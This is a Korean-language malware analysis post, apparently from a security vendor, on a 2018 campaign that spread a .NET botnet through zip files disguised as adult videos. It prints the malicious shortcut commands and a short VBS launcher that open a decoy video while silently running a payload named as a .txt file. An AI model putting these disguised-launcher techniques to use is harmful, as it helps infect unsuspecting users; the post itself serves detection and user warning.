20186월 초부터 음란물과 함께 악성코드가 활발히 유포되고 있는 것을 확인했다.해당 악성코드는 음란 게시글을 이용해 사용자들에게 *.zip 파일을 다운받게 유도했고, 다운받은 zip을 풀어 실행할 경우 실제 음란 사진 또는 음란 동영상이 실행되어 사용자가 악성코드에 감염된 사실을 인지하지 못하게 한다.


[그림-1] 620일 자 업로드 된 음란 게시글


   [그림-1]과 같은 게시글에서 파일을 다운로드 후 압축을 풀면 [그림-2] 처럼 *.mp4를 실행하는 바로가기 파일(*.LNK) 하나만 보이지만 폴더 옵션에서 “숨김파일 표시”를 체크하면 [그림-3] 처럼 mp4, lnk, txt 세 가지 확장자를 가진 파일이 존재함을 알 수 있다.


[그림-2] 6월20일 이전 유포된 악성코드 zip - 숨김파일 표시안함


[그림-3] 6월20일 이전 유포된 악성코드 zip - 숨김파일 표시


사용자의 클릭을 유도하는 바로가기 파일의 명령어를 보면 사용자가 인지하지 못하게 실제 *.mp4 동영상 파일도 실행하고, cmd를 이용하여 *.txt를 실행한다참고로 XP의 경우 확장자가 *.txt이면 notepad가 실행되지만 Win7의 경우 파일 구조에 맞게 EXE가 실행된다.


[그림-4] 바로가기 파일 속성


 %windir%\system32\cmd.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden cmd /c @start 국산순두부.mp4 & cmd /c @start 국산순두부.txt

[표-1] 바로가기 명령어


안랩에 수집된 악성코드의 파일명을 보면 자극적인 이름을 사용하고 확장자는 *.txt 를 사용하였다. 실제로 해당 파일들은 64bit 닷넷 악성코드로실행 시 정상 프로세스 명으로 위장한 파일 2개를 생성 및 실행한다실행 된 프로세스는 GoBOT2”이라는 Botnet 이다.


[그림-5] 안랩에 수집된 파일 중 일부


620일 기준으로는 바로가기 파일이 VBS파일을 실행시키고, VBS파일이 동영상 및 악성코드를 실행시키는 구조로 변화했다.



[그림-6] 6월 20일 수집된 zip 파일


%windir%\system32\cmd.exe hidden cmd /c @start 조건처음이야.vbs

[표-2] 6월 20일 수집된 바로가기 파일 명령어

Set WshShell = WScript.CreateObject("WScript.Shell")

return = WshShell.Run ("cmd /c @start 조건처음이야.mp4 & cmd /c @start 조건처음이야.txt" ,0 ,true)

[표-3] 6월 20일 수집된 VBS 코드


바로가기 파일에 의해 실행되는 악성코드는 2016년 이후 부터 랜섬웨어, 마이너류에 많이 사용되어왔. 그러므로 사용자는 늘 인터넷에서 파일을 다운로드 받을 경우 알 수 없는 글에 대해 주의하여야 한다.


현재 안랩 제품에서는 음란물과 함께 유포되는 악성코드를 다음과 같이 진단하고 있다.


- Trojan/Win64.Agent(2018.06.10.01)

- LNK/Runner (2018.06.11.01)

- LNK/Autorun.Gen (2018.06.15.00)




Posted by 분석팀